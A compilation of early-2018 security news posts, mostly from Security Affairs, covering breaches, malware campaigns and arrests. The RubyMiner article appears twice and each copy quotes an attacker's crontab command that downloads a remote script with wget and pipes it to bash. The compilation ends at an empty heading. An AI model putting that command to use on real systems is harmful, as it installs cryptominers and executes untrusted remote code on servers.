The incident was announced by the national healthcare security centre HelseCERT that detected an abnormal activity against computer systems in the region. HelseCERT notified the incident to local authorities as well as NorCERT.

“We are in a phase where we try to get an overview. It’s far too early to say how big the attack is. We are working to acquire knowledge of all aspects,” Kjetil Nilsen, director of NorCERT, the National Security Authority (NSM) told Norwegian media outlet VG.

“Everything indicates that it is an advanced player who has the tools and ability to perform such an attack. It can be advanced criminals. There is a wide range of possibilities,”

According to the HelseCert, the security breach is the result of an attack conducted by ‘advanced’ and ‘professional’ hackers.

Authorities announced important measures to limit the damage caused by the security breach.

“A number of measures have been implemented to remove the threat, and further measures will be implemented in the future,” announced Norway’s Ministry of Health and Care in a statement.

“This is a serious situation and measures have been taken to limit the damage caused by the incident,” reads a joint statement published by Health South East RHF and Sykehuspartner HF

The hospitals in the region currently serve 2.9 million inhabitants, that correspond to 56 percent of the overall population composed of 5.2 million citizens.

norway Health South East RHF

Health records are a precious commodity in the cybercrime underground, but are also considered by nation-state actors a mine of data that could be used in further attacks. Experts and government representatives believe that the data breach suffered by the Health South-East RHF could be the result of a cyber espionage campaign conducted by a foreign state interested in gathering data related to people who work in government, military, intelligence personnel, and politicians.

The VG newspaper reported that Health South East hired Hewlett Packard Enterprise in the autumn of 2016 to modernize computer systems in the healthcare company, but the project was suspended because NRK revealed poor control of access to patient data.

The Health South East RHF data breach seems to be not related to the above project, as confirmed by CEO Cathrine Lofthus.

“We have investigated that is important to us. We do not see any connection between this attack and that project, “says Lofthus.

Pierluigi Paganini

(Security Affairs – Health South East RHF, data breach)

The post Health South East RHF data breach exposed health records for half of Norway’s Population appeared first on Security Affairs.

Threat actors are delivering the Zyklon Malware exploiting three Office vulnerabilities

Security experts from FireEye have spotted a new strain of the Zyklon malware that has been delivered by using new vulnerabilities in Microsoft Office.

Researchers at FireEye reported the malware was used in attacks against organizations in the telecommunications, financial, and insurance sectors.

Zyklon has been spotted for the first time in 2016, it is a publicly available malware that could be used for multiple purposes such as espionage campaigns, DDoS attacks or to mine cryptocurrency.

“FireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware.” reads the analysis published by FireEye.

“Zyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal.”

The malware is modular, it can download several plugins to implement different features, it may communicate with C&C server over The Onion Router (Tor) network.

In this last campaign, the malicious code has been delivered via spam emails using as a ZIP archive that contains a specially crafted Word document.

The document exploits one of three vulnerabilities in Microsoft Office to deliver a PowerShell script that downloads the final Zyklon payload from a remote server.

Zyklon malware

One of the flaws exploited by the attackers is CVE-2017-8759, a flaw that was fixed by Microsoft in September 2017 after it was exploited by threat actors such as the Cobalt group to deliver malware in attacks wild.

A second triggered by the documents used in the campaign spotted by FireEye is CVE-2017-11882, a 17-year-old vulnerability in MS Office that could be exploited by remote attackers to install a malware without user interaction.
The flaw is a memory-corruption issue that affects all versions of Microsoft Office released in the past 17 years, including the latest Microsoft Office 365. The vulnerability could be triggered on all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

The vulnerability affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.

This flaw was used by differed APT groups, including the Cobalt group and Iran-linked hackers.

The attackers also exploited the Dynamic Data Exchange (DDE) feature in Office to deliver the malicious code, the same feature was abused by at least one Russian APT group in cyber espionage campaigns and by the powerful Necurs botnet to deliver ransomware.

Once the malware has successfully exploited one of these flaws, it will download a PowerShell script that injects code and fetches the final payload from a remote server.

FireEye highlighted the fact that attackers are exploiting recently discovered flaws in widely adopted software such as the Office suite to increase the likelihood of infecting the victims’ machines.

“Threat actors incorporating recently discovered vulnerabilities in popular software – Microsoft Office, in this case – only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.” concludes FireEye.

Technical details about the threat, including the Indicators of Compromise, are available in the report published by FireEye.

Pierluigi Paganini

(Security Affairs –Zyklon malware, Office)

The post Threat actors are delivering the Zyklon Malware exploiting three Office vulnerabilities appeared first on Security Affairs.

KillaMuvz, the creator of the Cryptex tool family pleads guilty to running malware services

The Briton Goncalo Esteves (24), also known as KillaMuvz, has pleaded guilty to charges related to creating and running malware services.

“A cyber criminal has admitted running a product-testing service for hackers following a joint investigation by the National Crime Agency (NCA) and cyber security firm Trend Micro.

Goncalo Esteves, 24, of Cape Close, Colchester, Essex, ran the website reFUD.me, which allowed offenders to test, for a fee, whether their malicious cyber tools could beat anti-virus scanners.” reads the announcement published by the NCA.

“Under the pseudonym KillaMuvz, he also sold custom-made malware-disguising products and offered technical support to users.

He pleaded guilty to two computer misuse offences and a count of money laundering at Blackfriars Crown Court.”

Esteves advertised his service on the hackforums.net website, a well-known crime messageboard.

“A free service that offers fast and reliable file scanning to ensure that your files remain fully undetectable to anti-malware software.” reads the ad.

The NCA reported that Esteves made £32,000 from more than 800 Paypal transactions between 2011 and 2015.

There are no other information about the transactions made in Bitcoins and using Amazon vouchers.

The post KillaMuvz, the creator of the Cryptex tool family pleads guilty to running malware services appeared first on Security Affairs.

RubyMiner Monero Cryptominer affected 30% of networks worldwide in just 24h

Security researchers at Check Point have spotted a malware family dubbed RubyMiner that is targeting web servers worldwide in an attempt to exploit their resources to mine Monero cryptocurrency.

RubyMiner, was first spotted last week when a massive campaign targeted web servers worldwide, most of them in the United States, Germany, United Kingdom, Norway, and Sweden.

The experts believe that a single lone attacker is behind the attacks, in just one day he attempted to compromise nearly one-third of networks globally.

“In the last 24 hours, 30% of networks worldwide have experienced compromise attempts by a crypto-miner targeting web servers.” read the analysis from Check Point.

“During that period, the lone attacker attempted to exploit 30% of all networks worldwide to find vulnerable web servers in order to mobilize them to his mining pool. Among the top countries targeted are the United States, Germany, United Kingdom, Norway and Sweden, though no country has gone unscathed.”

RubyMiner

The malware targets both Windows and Linux servers, attempting to exploit old vulnerabilities in PHP, Microsoft IIS, and Ruby on Rails to deploy the Monero miner.

The Italian security firm Certego noticed the same attacks that began on January 10.

“Our threat intelligence platform has been logging a huge spike in ruby http exploiting since yesterday (10 January) at 23:00.” states the report published by Certego.

“The exploit has been trying to leverage a fairly old CVE (CVE-2013-0156) that allows remote code execution. The following public Emerging Threat signature cover the exploit:”

The attack doesn’t appear very sophisticated, the hacker did not attempt to conceal his operations, but it was focused on infecting the larger number of servers in the shortest time.

“Surprisingly, by using old vulnerabilities published and patched in 2012 and 2013, it doesn’t seem that stealth was part of the attacker’s agenda either. Instead, the attacker chose to exploit multiple vulnerabilities in HTTP web servers, to distribute an open source Monero miner – XMRig.” continues the analysis.

“In fact, XMRig usually sends a donation of 5% of the revenue gained from the mining process to the code’s author. However, even this amount was too much for the attacker to part with as that ‘donation element’ was deleted from the code, giving the enthusiast 100% of the profit.”

At the time of the report, only 700 servers worldwide have been successfully compromised in the first 24 hours of attacks.

The experts from Certego observed the attacker exploiting the CVE-2013-0156 remote code execution flaw in Ruby on Rails.

The attacker sends a base64 encoded payload inside a POST request in the attempt to trick the interpreter into executing it.

The malicious payload is a bash script that adds a cronjob that runs every hour and downloads a robots.txt file containing a shell script, used to fetch and execute the cryptominer. The scheduler is being told to run the whole process, including downloading the file from the server every hour.

“The cron is a UNIX based scheduler which allows running scheduled tasks at fixed times via its own syntax. Running the crontab command with the –r argument will remove all existing tasks in the existing crontab and allow for the miner to take full priority.” continues the analysis from Checkpoint.

echo “1 * * * * wget -q -O – http://internetresearch.is/robots.txt 2>/dev/null|bash >/dev/null 2>&1″|crontab –   

“Now the attacker can inject the new job to the clean crontab file using the “1 * * * *” which will tell the scheduler to run once an hour for one minute infinitely.

The new job will download and execute the “robots.txt” file hosted on “internetresearch.is.” and the mining process can begin.”

Experts believe that the robots.txt file could be used also as a kill switch for RubyMiner,  modify the robots.txt file on the compromised webserver it is possible to deactivate the malware.

“Within a minute, all the machines re-downloading the file will be receiving files without the crypto miners,” Check Point notes.

The expert noticed that one of the domains used by the attacker, lochjol.com, was involved in an attack that abused the Ruby on Rails vulnerability in 2013.

Check Point researchers also published the IoC related to RubyMiner.

Pierluigi Paganini

(Security Affairs –Monero Miner, RubyMiner)

The post RubyMiner Monero Cryptominer affected 30% of networks worldwide in just 24h appeared first on Security Affairs.

Security Affairs: RubyMiner Monero Cryptominer affected 30% of networks worldwide in just 24h

Security researchers at Check Point have spotted a malware family dubbed RubyMiner that is targeting web servers worldwide in an attempt to exploit their resources to mine Monero cryptocurrency.

RubyMiner, was first spotted last week when a massive campaign targeted web servers worldwide, most of them in the United States, Germany, United Kingdom, Norway, and Sweden.

The experts believe that a single lone attacker is behind the attacks, in just one day he attempted to compromise nearly one-third of networks globally.

“In the last 24 hours, 30% of networks worldwide have experienced compromise attempts by a crypto-miner targeting web servers.” read the analysis from Check Point.

“During that period, the lone attacker attempted to exploit 30% of all networks worldwide to find vulnerable web servers in order to mobilize them to his mining pool. Among the top countries targeted are the United States, Germany, United Kingdom, Norway and Sweden, though no country has gone unscathed.”

RubyMiner

The malware targets both Windows and Linux servers, attempting to exploit old vulnerabilities in PHP, Microsoft IIS, and Ruby on Rails to deploy the Monero miner.

The Italian security firm Certego noticed the same attacks that began on January 10.

“Our threat intelligence platform has been logging a huge spike in ruby http exploiting since yesterday (10 January) at 23:00.” states the report published by Certego.

“The exploit has been trying to leverage a fairly old CVE (CVE-2013-0156) that allows remote code execution. The following public Emerging Threat signature cover the exploit:”

The attack doesn’t appear very sophisticated, the hacker did not attempt to conceal his operations, but it was focused on infecting the larger number of servers in the shortest time.

“Surprisingly, by using old vulnerabilities published and patched in 2012 and 2013, it doesn’t seem that stealth was part of the attacker’s agenda either. Instead, the attacker chose to exploit multiple vulnerabilities in HTTP web servers, to distribute an open source Monero miner – XMRig.” continues the analysis.

“In fact, XMRig usually sends a donation of 5% of the revenue gained from the mining process to the code’s author. However, even this amount was too much for the attacker to part with as that ‘donation element’ was deleted from the code, giving the enthusiast 100% of the profit.”

At the time of the report, only 700 servers worldwide have been successfully compromised in the first 24 hours of attacks.

The experts from Certego observed the attacker exploiting the CVE-2013-0156 remote code execution flaw in Ruby on Rails.

The attacker sends a base64 encoded payload inside a POST request in the attempt to trick the interpreter into executing it.

The malicious payload is a bash script that adds a cronjob that runs every hour and downloads a robots.txt file containing a shell script, used to fetch and execute the cryptominer. The scheduler is being told to run the whole process, including downloading the file from the server every hour.

“The cron is a UNIX based scheduler which allows running scheduled tasks at fixed times via its own syntax. Running the crontab command with the –r argument will remove all existing tasks in the existing crontab and allow for the miner to take full priority.” continues the analysis from Checkpoint.

echo “1 * * * * wget -q -O – http://internetresearch.is/robots.txt 2>/dev/null|bash >/dev/null 2>&1″|crontab –   

“Now the attacker can inject the new job to the clean crontab file using the “1 * * * *” which will tell the scheduler to run once an hour for one minute infinitely.

The new job will download and execute the “robots.txt” file hosted on “internetresearch.is.” and the mining process can begin.”

Experts believe that the robots.txt file could be used also as a kill switch for RubyMiner,  modify the robots.txt file on the compromised webserver it is possible to deactivate the malware.

“Within a minute, all the machines re-downloading the file will be receiving files without the crypto miners,” Check Point notes.

The expert noticed that one of the domains used by the attacker, lochjol.com, was involved in an attack that abused the Ruby on Rails vulnerability in 2013.

Check Point researchers also published the IoC related to RubyMiner.

Pierluigi Paganini

(Security Affairs –Monero Miner, RubyMiner)

The post RubyMiner Monero Cryptominer affected 30% of networks worldwide in just 24h appeared first on Security Affairs.



Security Affairs

Play Store Gaming Apps Infected with Malware

An android malware named “AdultSwine” has attacked children-friendly gaming apps in the play store. Over 60 apps have been pulled by Google after recognizing the malware.

The malware causes pornographic content to show on the devices while the infected app is running, aside from trying to get users to install fake security apps and charging for unregistered premium services. The malware reportedly has the ability to steal user credentials.

The malware was discovered by researchers at Checkpoint and the affected apps have since been pulled by Google, and the developers’ accounts banned.

The affected apps have been downloaded as much as 3 to 7 million times, according to Play Store data.

A comprehensive list of affected apps and related research can be found on Checkpoint’s research blog. Google will continue to send notifications to phones that have the affected apps installed.

Four malicious Chrome extensions affected over half a million users and global businesses

Four malicious Chrome extensions may have impacted more than half million users likely to conduct click fraud or black search engine optimization.

More than half million users may have been infected by four malicious Chrome extensions that were likely used to conduct click fraud or black search engine optimization.

According to ICEBRG, the malicious extensions also impacted employees of major organizations, potentially allowing attackers to gain access to corporate networks.

“Recently, ICEBRG detected a suspicious spike in outbound network traffic from a customer workstation which prompted an investigation that led to the discovery of four malicious extensions impacting a total of over half a million users, including workstations within major organizations globally.” states the analysis published by  ICEBRG. “Although likely used to conduct click fraud and/or search engine optimization (SEO) manipulation, these extensions provided a foothold that the threat actors could leverage to gain access to corporate networks and user information.”

The researchers noticed an unusual spike in outbound traffic volume from a customer workstation to a European VPS provider. The analysis of the HTTP traffic revealed it was to the domain ‘change-request[.]info’ and was generated from a Chrome extension with ID ‘ppmibgfeefcglejjlpeihfdimbkfbbnm’ named Change HTTP Request Header that was available via Google’s Chrome Web Store.

Malicious Chrome Extensions

The extension does not contain any malicious code, but the combination of “two items of concern that” could allow attackers to inject and execute an arbitrary JavaScript code via the extension.

The experts highlighted that Chrome extensions are not allowed to retrieve JSON from an external source and execute JavaScript code they contain, but need to explicitly request its use via the Content Security Policy (CSP).

Once enable the ‘unsafe-eval’ (Figure 3) permission to retrieve the JSON from an external source the attacker can force the browser to execute malicious code.

“When an extension does enable the ‘unsafe-eval’ (Figure 3) permission to perform such actions, it may retrieve and process JSON from an externally-controlled server.” “This creates a scenario in which the extension author could inject and execute arbitrary JavaScript code anytime the update server receives a request.” continues the analysis.

The Change HTTP Request Header extension is able to download obfuscated JSON files from an external source (‘change-request[.]info’), by invoking the ‘update_presets()’ function.

The Chrome extension implemented an anti-analysis technique to avoid detection.

The extension checks the JavaScript for the presence of native Chrome debugging tools (chrome://inspect/ and chrome://net-internals/), and if detected, halts the injection of malicious code segment. The Chrome extension implemented an anti-analysis technique to avoid detection.

Once injected the code, the JavaScript creates a WebSocket tunnel with ‘change-request[.]info’ and uses it to proxy browsing traffic via the victim’s browser.

During the analysis, the experts observed that this feature was observed by threat actors for visiting advertising related domains likely to conduct click fraud scams.

“The same capability could also be used by the threat actor to browse internal sites of victim networks, effectively bypassing perimeter controls that are meant to protect internal assets from external parties.” continues the analysis.

The security experts discovered other Chrome extensions with a similar behavior and using the same C&C server.

  • Nyoogle – Custom Logo for Google
  • Lite Bookmarks
  • Stickies Chrome’s Post-it Notes

Pierluigi Paganini

(Security Affairs –Malicious Chrome extensions, cybercrime)

The post Four malicious Chrome extensions affected over half a million users and global businesses appeared first on Security Affairs.

Canadian man charged over leak of billions hacked accounts through LeakedSource

A Canadian Man supposed to be the admin of the LeakedSource.com website was charged over the leak of 3 billion hacked accounts.

The post Canadian man charged over leak of billions hacked accounts through LeakedSource appeared first on Security Affairs.

3 ways to keep businesses safe from cybercrime in 2018

In the fight against cybercrime, companies can expect things to keep getting worse before they get any better With 2.7 billion more IoT devices brought online in 2017, businesses saw

The post 3 ways to keep businesses safe from cybercrime in 2018 appeared first on The Cyber Security Place.

Reporting for duty: how sharing information helps to tackle cybercrime

In the physical world, people report burglaries to law enforcement all the time. Although some individual crimes may go unsolved because of size or volume, reporting contributes to better policing overall. That’s why it’s important to tell law enforcement whenever your business has experienced a cybercrime incident – even an unsuccessful one.

Improving cybercrime statistics

Reporting gives law enforcement valuable intelligence about crime trends, attack methods, victim types, and financial costs. More accurate crime statistics lead to better decisions about staff resourcing, budgeting and reporting. If one type of crime like cybercrime is increasing noticeably, law enforcement can request more resources for their investigative teams. As a result, these added resources make those agencies better equipped to address cybercrime.

Reducing business risk

So what incentive does the infosecurity professional or IT manager have to report incidents rather than keeping them under wraps? “As a function, information security is an expense the business bears in order to reduce loss and risk. At the end of the day, its job is to protect the business, not to go after the bad guys. Reporting crimes to law enforcement helps take those responsible for crime off the internet,” says Brian Honan, CEO of BH Consulting.

The more that companies report, the more data law enforcement can gather and, crucially, share with other agencies. It’s a vital tool in targeting criminals, and is critical in combating cybercrime which by its nature is transnational. For example, in December, Romanian law enforcement officials arrested five people, including three suspected of spreading CTB-Locker or Critroni ransomware. The arrests came about after Europol, the FBI, and Dutch National Police shared intelligence with Romanian authorities.

Calling for backup

Europol has a useful page with links for reporting cybercrime to law enforcement in every EU country. The No More Ransom project also has a similar page for specifically reporting a ransomware infection. This page directs readers to the relevant local law enforcement agency, where they can follow the link to report ransomware.

As well as advising reporting after an incident has happened, Brian also recommends proactive steps that infosec professionals can take. He suggests identifying the person in their local law enforcement who is responsible for investigating cybercrime. “Arrange to meet them informally, and ask them what they need from you to help them do their job,” he says.

It’s always better to know those contacts before a breach happens than during one. In addition, reporting an incident to law enforcement doesn’t necessarily mean it will become public. If discretion is called for, a good prior relationship with your local law enforcement agency could help.

The post Reporting for duty: how sharing information helps to tackle cybercrime appeared first on BH Consulting.

New KillDisk variant targets Windows machines in financial organizations in Latin America

A new variant of the infamous disk-wiper malware KillDisk has been spotted by malware researchers at Trend Micro while targeting financial organizations in Latin America.

A new variant of the infamous disk-wiper malware KillDisk has been spotted by malware researchers at Trend Micro. This variant of KillDisk, tracked as TROJ_KILLDISK.IUB, was involved in cyber attacks against financial organizations in Latin America, it is delivered by a different piece of malware or it may be part of a bigger attack.

“We came across a new variant of the disk-wiping KillDisk targeting financial organizations in Latin America.” reads a preliminary analysis published by TrendMicro.

“Because KillDisk overwrites and deletes files (and doesn’t store the encryption keys on disk or online), recovering the scrambled files was out of the question.”

KillDisk and the ICS-SCADA malware BlackEnergy, were used in the attacks that caused the power outage in Ukraine in December 2015.

It was used in the same period also against mining companies, railways, and banks in Ukraine. The malware was later included in other malicious codes, including Petya.

In December 2016, researchers at security firm CyberX discovered a variant of the KillDisk malware that implemented ransomware features.

This latest variant targets Windows machines deleting any file stored on drives, except for system files and folders.

“The malware attempts to wipe \\.\PhysicalDrive0 to \\.\PhysicalDrive4. It reads the Master Boot Record (MBR) of every device it successfully opens and proceeds to overwrite the first 0x20 sectors of the device with “0x00”. It uses the information from the MBR to do further damage to the partitions it lists.” states Trend Micro. “If the partition it finds is not an extended one, it overwrites the first 0x10 and last sectors of the actual volume. If it finds an extended partition, it will overwrite the Extended Boot Record (EBR) along with the two extra partitions it points to.”

Once the malware has deleted and overwritten files and folders it attempts to terminate several processes to force the machine reboots.

The processed targeted by the malware are:

  • Client/server run-time subsystem (csrss.exe)
  • Windows Start-Up Application (wininit.exe)
  • Windows Logon Application (winlogon.exe)
  • Local Security Authority Subsystem Service (lsass.exe)

Trend Micro is still investigating this news KillDisk variant, meantime it is inviting companies to adopt a “defense in depth” approach securing the perimeters from gateways, endpoints, and networks to servers.

Pierluigi Paganini

(Security Affairs – KillDisk , wiper)

The post New KillDisk variant targets Windows machines in financial organizations in Latin America appeared first on Security Affairs.

Blackwallet hacked, hackers stole $400,000 from users’ accounts through DNS hijacking

BlackWallet.co was victims of a DNS hijacking attack, on January 13 the attackers have stolen over $400,000 from users’ accounts (roughly 670,000 Lumens).

The spike in cryptocurrency values is attracting cybercriminals, the last victim is the BlackWallet.co a web-based wallet application for the Stellar Lumen cryptocurrency (XLM).

The platform was victims of a DNS hijacking attack, on January 13 the attackers have stolen over $400,000 from users’ accounts (roughly 670,000 Lumens).

According to Bleeping Computer, the attackers collected 669,920 Lumens, which is about $400,192 at the current XML/USD exchange rate.

Stellar Lumen today is considered as the eight most popular cryptocurrency.

The attackers hijacked the DNS entry of the BlackWallet.co domain and redirected it to a server they operated, as result of the attack, the application suspended its service.

Technically users were logging to the bogus domain entering their credentials, then the attackers used them to access the account and steal the funds.

 

Users on Reddit and other communities promptly spread the news of the hack.

The attackers immediately started moving funds from the XLM account to Bittrex, a cryptocurrency exchange, in the attempt to launder them by converting in other digital currency.

blackwallet hacked

The situation is critical, admins are asking Bittrex to block the attackers’ operations before is too late.

“I am the creator of Blackwallet. Blackwallet was compromised today, after someone accessed my hosting provider account. He then changed the dns settings to those of its fraudulent website (which was a copy of blackwallet).” the Blackwallet creator wrote on Reddit.

“Hacker wallet is: https://stellarchain.io/address/GBH4TZYZ4IRCPO44CBOLFUHULU2WGALXTAVESQA6432MBJMABBB4GIYI

I’ve contacted both SDF and Bittrex to ask them to block the bittrex’s account of the hacker. I’ve contacted my hosting provider to disable my account and my websites.

Hacker sent the funds to a bittrex account. This might lead to an identity.”

According to the BlackWallet admin, the incident took place after someone accessed his hosting provider account.

The creator of the web-based wallet application is trying to collect more info about the hack from his hosting provider.

“If you ever entered your key on blackwallet, you may want to move your funds to a new wallet using the stellar account viewer,” he added. “Please note however that blackwallet was only an account viewer and that no keys were stored on the server!” he added in the statement.

In December, the popular cryptocurrency exchange EtherDelta suffered a similar incident, attackers conducted a DNS attack that allowed to steal at least 308 ETH ($266,789) as well as a large number of tokens.

Pierluigi Paganini

(Security Affairs – hacking, Lumens)

The post Blackwallet hacked, hackers stole $400,000 from users’ accounts through DNS hijacking appeared first on Security Affairs.

Mirai Okiru botnet targets for first time ever in the history ARC-based IoT devices

Researcher @unixfreaxjp spotted the first time ever in the history of computer engineering a Linux malware designed to infect ARC CPU, this new Linux ELF malware was dubbed MIRAI OKIRU.

In August 2016 the researcher @ from @ team first spotted the dreaded Mirai botnet, now the same researcher is announcing a new big earthquake in the malware community.

 spotted the first time ever in the history of computer engineering a Linux malware designed to infect ARC CPU, this new Linux ELF malware was dubbed MIRAI OKIRU.

This is the first time that a malware specifically targets ARC-based systems, the Mirai Okiru was undetected by almost all the antivirus engines at the time of its discovery.

Mirai ARC OKIRU

“!! Please be noted of this fact, and be ready for the bigger impact on infection Mirai (specially Okiru) to devices that hasn’t been infected yet.” said 

The Linux IoT threat landscape is rapidly changing, crooks will start targeting IoT devices based on ARC CPU.

“From this day, the landscape of #Linux #IoT infection will change. #ARC cpu has produced #IoT dervices more than 1 billion per year. So these devices are what the hackers want to aim to infect #ELF #malware with their #DDoS cannons. It’s a serious threat will be. #MalwareMustDie!” wrote MMD.

As highlighted by the colleague  the impact of such botnet could be devastating, it has been estimated that ARC embedded processors are shipped in more than 1.5 billion products per year. This means that the number of the potentially exposed devices is enormous, and a so powerful botnet could be used for a multitude of malicious purposes.

“ARC (Argonaut RISC Core) embedded processors are a family of 32-bit CPUs originally designed by ARC International. They are widely used in SoC devices for storage, home, mobile, automotive, and Internet of Things applications. ARC processors have been licensed by more than 200 organizations and are shipped in more than 1.5 billion products per year.” reads Wikipedia.

#Mirai #Okiru variant is very dangerous, if you see how the coder made specific “innovative modification” in its variant codes+encryption you’ll see what I mean, & now they are the 1st malware to aim #ARC core. These guys can make greater chaos if not be stopped. Mark my word” wrote MalwareMustDie.

It is very important to understand that the Mirai Satori variant is very different from Okiru as explained by MalwareDustdie.

  1. From what we observe so far. these two types are very different, (among of several common similar characteristic), we think it is good to have different rules to detect Mirai variant Okiru and Satori
  2. Some simple highlights to differ Okiru to Satori variant:
  • The config is different, Okiru variant’s config is encrypted in two parts w/ telnet bombardment password encrypted, Satori does not split it in 2parts and doesn’t encrypt brute default passwords. Also Okiru’s telnet attack login information is a bit longer (can be up to 114 credentials, max counted), while Satori is having different and shorter database.
  • Satori seem to have “TSource Engine Query” common Distributed “Reflective” (DRDoS) attack function via random UDP, while Okiru does not seem to have this function,
  • The infection follow up commands written in both Okiru and Satori in their configurations are a bit different, showing possibility that they don’t seem sharing a same “herding environment”,
  • (up to) Four types of router attack exploit code has only being spotted hard coded in Okiru variant, yet Satori does not use these exploits at all,
  • Satori (see VT comment part for reversed code) is using small embedded ELF trojan downloaders to download other architecture binaries which were coded differently compared to Okiru ones (see reversed code is in VT comment),
  • (there are more minors stuff too that you can notice using the pictures shown in previous points, like differences in usage of watchdog, the usage of command “echo -en \x…” etc)

wrote MalwareMustDie.

 ARC Core CPU base compiled Mirai Okiru ELF malware (botnet client) (ELF 32-bit LSB executable, ARC Cores Tangent-A5, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, for GNU/Linux 4.8.0, stripped).

The risk that someone could build a powerful Mirai Okiru botnet composed of a billion device is concrete.

Researchers from MalwareMustDie published the Yara rules for the threat

https://github.com/unixfreaxjp/rules/blob/master/malware/MALW_Mirai_Okiru_ELF.yar

and IoCs:

  • MD5: 9c677dd17279a43325556ec5662feba0
  • MD5: 24fc15a4672680d92af7edb2c3b2e957

Stay tuned …

Pierluigi Paganini

(Security Affairs – Mirai Okiru botnet, Linux malware)

The post Mirai Okiru botnet targets for first time ever in the history ARC-based IoT devices appeared first on Security Affairs.

Fappening – A fourth man has been charged with hacking into over 250 Apple iCloud accounts belonging to celebrities

Fappening – A fourth hacker, George Garofano (26), of North Branford, has been charged with hacking into over 250 Apple iCloud accounts belonging to celebrities.

A fourth hacker, George Garofano (26), of North Branford, has been charged with hacking into over 250 Apple iCloud accounts belonging to celebrities.

Garofano had been arrested by the FBI and a federal court has accused him of violating the Computer Fraud and Abuse Act.

From April 2013 through October 2014, Garofano used phishing attacks against the victims to obtain their iCloud accounts credentials, access the accounts and steal personal information, including private photographs and videos.

“According to the plea agreement, from April 2013 through October 2014, Garofano engaged in a phishing scheme to obtain usernames and passwords for iCloud accounts. Garofano admitted that he sent e-mails to victims that appeared to be from security accounts of Apple and encouraged the victims to send him their usernames and passwords, or to enter them on a third-party website, where he would later retrieve them.” reads the press release published by the DoJ.

“Garofano used the usernames and passwords to illegally access his victims’ iCloud accounts, which allowed him to steal personal information, including sensitive and private photographs and videos, according to his plea agreement. In some instances, Garofano traded the usernames and passwords, as well as the materials he stole from the victims, with other individuals.”

As part of the Fappening case, nude pictures of many celebrities were leaked online, the list of victims is long and includes Kim Kardashian, Kate Upton, and Jennifer Lawrence.

Garofano also traded the stolen credentials, as well as the information he stole from the victims’ accounts, with other individuals.

In a plea agreement signed last week in U.S. District Court in Los Angeles, Garofano agreed to plead guilty to one count of unauthorized access to a protected computer to obtain information.

The man is now facing up to 5 years in federal prison.

fappening

Garofano is the fourth man charged in connection with the Fappening saga, in past months Emilio HerreraEdward MajerczykRyan Collins, pleaded guilty to being involved in the attacks on the celebrities’ iCloud accounts.

Collins was sentenced to 18 months in federal prison, Majerczyk to nine months and Herrera is waiting for sentencing next month.

Pierluigi Paganini

(Security Affairs – Fappening, FBI)

The post Fappening – A fourth man has been charged with hacking into over 250 Apple iCloud accounts belonging to celebrities appeared first on Security Affairs.

New Intel Security Flaw Detected

F-Secure, a Finnish cybersecurity firm revealed on Friday that it has discovered another security flaw in the Intel hardware. This flaw could enable hackers to access corporate laptops remotely.

Earlier it was revealed that the Intel chip had flaws that made almost every smartphone, laptop, or tablets vulnerable to hackers. This flaw is allegedly unrelated to Spectre and Meltdown but is rather an issue within Intel Active Management Technology (AMT).

According to F-Secure, AMT is commonly found in most corporate laptops and the flaw will allow an attacker to take complete control over a user's device in a matter of seconds.

“The issue potentially affects millions of laptops globally," the cybersecurity firm said.

The hacker would need physical access to the device at first but once they had re-configured the AMT, they would be able to effectively “backdoor” the machine and access the device using a remote server, just by connecting to the same network as the user.

There is also a possibility that the hacker would be able to programme the AMT to their own server, thus bypassing the need to connect to the user’s network.

The hacker will be able to access all information on the device after exploiting the flaw and will be able to make changes, download malware, etc. quite easily. No solutions or security measures have been found as yet, other than choosing a strong AMT password or disabling the AMT completely.

Hackers Target Winter Olympics to be Held in South Korea

Cybersecurity company McAfee has discovered that hackers have targeted organizations connected to the Winter Olympics that will be held in South Korea, and have tried to access sensitive information.

The hacking campaign ran from December 22 and is still under investigation by the firm. McAfee has stated that the attacks point to “a nation-state adversary that speaks Korean.”

The attacks seem to have been carried out via emails sent to various organizations which contained a malicious document that would create a hidden black channel inside the computer if enabled. These emails are disguised as being sent by South Korea’s National Counter-Terrorism Council.

The emails were sent from a Singapore IP address and told receivers to open a text document in Korean.

Among those sent the messages are individuals associated with the ice hockey tournament at the Olympics. A report can be seen on their website by McAfee Labs here.

It has been reported that at least one of the recipient was infected by the document, according to a senior analyst at McAfee.

Android Malware Attacking Over 232 Banking Apps Discovered

A new Android malware is reportedly targeting over 232 banking applications, including a few banks in India. This was discovered by the internet and cybersecurity firm Quick Heal, which identified the Android Banking Trojan imitating banking mobile apps around the world.

It includes major Indian banks apps from SBI, HDFC, ICICI, IDBI, and Axis, among others.

What is the malware?

The Trojan malware, named ‘Android.banker.A9480’, is being used to steal personal data such as login data, messages, contact lists, etc. from users and uploading it to a malicious server.

This malware also targets cryptocurrency apps installed on users’ phones to extract similar sensitive data.

Who has it affected?

According to Quick Heal, the banks affected by the malware include Axis mobile, HDFC Bank Mobile Banking, SBI Anywhere Personal, HDFC Bank Mobile Banking LITE, iMobile by ICICI Bank, IDBI Bank GO Mobile+, Abhay by IDBI Bank Ltd, IDBI Bank GO Mobile, IDBI Bank mPassbook, Baroda mPassbook, Union Bank Mobile Banking, and Union Bank Commercial Clients.

The full list can be found on Quick Heal’s original blog post.

How does the malware work?

The security firm has revealed that the malware is being distributed through a fake Flash Player app on third-party stores.

“This is not surprising given that Adobe Flash is one of the most widely distributed products on the Internet. Because of its popularity and global install base, it is often targeted by attackers,” the firm said in a statement.

Once the malicious app is installed, it will ask the user to activate administrative rights. The app sends continuous pop-ups until the user activates the admin privilege, even if the user denies the request or kills the process. Once activated, the malicious app hides its icon soon after the user taps on it.

They also revealed that if any of the targeted apps are found on the infected device, the app shows a fake notification on behalf of the targeted banking app. If the user clicks on the notification, they are shown a fake login screen to steal the user’s confidential info like net banking login ID and password.

Since the malware is able to intercept incoming and outgoing SMS from an infected smartphone, it can bypass the OTP based two-factor authentication on the user’s bank account and can misuse the access.

How can users protect their data?

